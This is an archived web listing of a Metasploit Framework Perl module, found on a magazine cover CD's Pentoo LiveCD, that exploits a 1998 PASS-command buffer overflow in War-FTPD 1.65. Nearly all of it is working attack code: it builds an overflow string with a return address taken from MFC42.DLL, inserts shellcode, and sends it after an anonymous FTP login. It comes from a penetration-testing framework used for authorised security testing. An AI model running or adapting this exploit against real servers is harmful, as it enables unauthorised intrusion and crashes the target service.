home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / warftpd_165_pass.pm

< prev

next >

Wrap

Text File  |  2006-06-30  |  3KB  |  115 lines

---

1.  
2. ##
3. # This file is part of the Metasploit Framework and may be redistributed
4. # according to the licenses defined in the Authors field below. In the
5. # case of an unknown or missing license, this file defaults to the same
6. # license as the core Framework (dual GPLv2 and Artistic). The latest
7. # version of the Framework can always be obtained from metasploit.com.
8. ##
9.  
10. package Msf::Exploit::warftpd_165_pass;
11. use base "Msf::Exploit";
12. use strict;
13. use Pex::Text;
14.  
15. my $advanced = { };
16. my $info =
17.   {
18.     'Name'    => 'War-FTPD 1.65 PASS Overflow',
19.     'Version' => '$Revision: 1.26 $',
20.  
21.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
22.     'Arch'  => [ 'x86' ],
23.     'OS'    => [ 'win32', 'win2000' ],
24.     'Priv'  => 0,
25.  
26.     'UserOpts'  =>
27.       {
28.         'RHOST' => [1, 'ADDR', 'The target address'],
29.         'RPORT' => [1, 'PORT', 'The target port', 80],
30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
31.       },
32.  
33.     'Payload' =>
34.       {
35.         'Space'  => 512,
36.         'BadChars'  => "\x00+&=%\x0a\x0d\x20",
37.       },
38.  
39.     'Description'  =>  Pex::Text::Freeform(qq{
40.         This exploits the buffer overflow found in the PASS command
41.         in War-FTPD 1.65. This particular module will only work
42.         reliably against Windows 2000 targets. The server must be
43.         configured to allow anonymous logins for this exploit to
44.         succeed. A failed attempt will bring down the service
45.         completely.    
46. }),
47.  
48.     'Refs'  =>
49.       [
50.         ['OSVDB', '875'],
51.         ['URL',   'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html'],
52.         ['MIL', '74'],
53.       ],
54.  
55.     'DefaultTarget' => 0,
56.     'Targets' => [ ["Windows 2000"] ],
57.  
58.     'Keys'  => ['warftpd'],
59.  
60.     'DisclosureDate' => 'Mar 19 1998',
61.   };
62.  
63. sub new {
64.     my $class = shift;
65.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
66.     return($self);
67. }
68.  
69. sub Exploit {
70.     my $self = shift;
71.     my $target_host = $self->GetVar('RHOST');
72.     my $target_port = $self->GetVar('RPORT');
73.     my $target_idx  = $self->GetVar('TARGET');
74.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
75.  
76.     my $request = ("META" x 1024);
77.  
78.     # this return address is a jmp ebx in the included MFC42.DLL
79.     substr($request, 562, 4, pack("V", 0x5f4e772b));
80.  
81.     substr($request, 558, 4, "\xeb\x08\xeb\x08");
82.     substr($request, 566, length($shellcode), $shellcode);
83.  
84.     my $s = Msf::Socket::Tcp->new
85.       (
86.         'PeerAddr'  => $target_host,
87.         'PeerPort'  => $target_port,
88.         'LocalPort' => $self->GetVar('CPORT'),
89.         'SSL'       => $self->GetVar('SSL'),
90.       );
91.     if ($s->IsError) {
92.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
93.         return;
94.     }
95.  
96.     my $r = $s->Recv(-1, 20);
97.     if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
98.  
99.     $self->PrintLine("[*] REMOTE> $r");
100.     $r = $s->Recv(-1, 10);
101.  
102.     $s->Send("USER ANONYMOUS\n");
103.     $r = $s->Recv(-1, 20);
104.     if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
105.     $self->PrintLine("[*] REMOTE> $r");
106.  
107.     $s->Send("PASS $request\n");
108.     $r = $s->Recv(-1, 20);
109.     if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
110.     $self->PrintLine("[*] REMOTE> $r");
111.  
112.     return;
113. }
114.  
115.